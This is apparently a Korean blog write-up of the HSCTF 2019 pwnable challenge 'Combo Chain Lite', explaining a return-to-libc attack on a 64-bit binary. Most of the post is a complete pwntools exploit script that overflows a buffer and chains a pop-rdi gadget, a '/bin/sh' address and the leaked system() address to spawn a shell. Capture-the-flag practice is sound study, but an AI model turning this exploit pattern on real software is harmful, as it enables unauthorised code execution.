일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | ||||
4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 |
18 | 19 | 20 | 21 | 22 | 23 | 24 |
25 | 26 | 27 | 28 | 29 | 30 | 31 |
Tags
- 이분 탐색
- syscall
- 브루트 포스
- heap
- 백트래킹
- 동적 계획법
- 문자열 처리
- House of Orange
- ROP
- BOF
- 포맷스트링버그
- 스택
- 분할 정복
- 완전 탐색
- DFS
- 이진트리
- OOB
- 큐
- 스위핑 알고리즘
- 투 포인터
- off by one
- 에라토스테네스의 체
- 다이나믹 프로그래밍
- 수학
- 이진 탐색
- 연결리스트
- fsb
- RTL
- BFS
- tcache
Archives
- Today
- Total
SDJ( 수돈재 아님 ㅎ )
HSCTF 2019 - Combo Chain Lite 본문
64bit 바이너리에 NX만 활성화 되어있다.
Lite문제는 system의 주소를 주고 문자열 끝에 "/bin/sh"도 준다.
따라서 RTL로 쉘을 따면 되겠다.
64bit는 rdi, rsi, rdx순으로 인자를 받으므로
pop_rdi 가젯을 찾아 /bin/sh를 넣고 system 함수를 호출하면 된다.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
from pwn import *
p = process('./combo-chain-lite')
pop_rdi = 0x401273
p.recvuntil("computer: ")
libc_system = int(p.recvuntil('\n').strip(), 16)
print "libc_system : " + hex(libc_system)
bin_sh = 0x402028 + len("Dude you hear about that new game called ")
pay = ''
pay += 'a'*0x8
pay += 'bbbbbbbb'
pay += p64(pop_rdi)
pay += p64(bin_sh)
pay += p64(libc_system)
p.sendline(pay)
p.interactive()
|
'write-up > pwnable' 카테고리의 다른 글
NACTF 2019 - BufferOverflow #0 (0) | 2019.09.23 |
---|---|
HSCTF 2019 - Storytime (0) | 2019.09.16 |
HSCTF 2019 - Combo Chain (0) | 2019.09.16 |
HSCTF 2019 - Return to Sender (0) | 2019.09.16 |
DefCamp CTF Qualification 2019 - secret (0) | 2019.09.14 |
Comments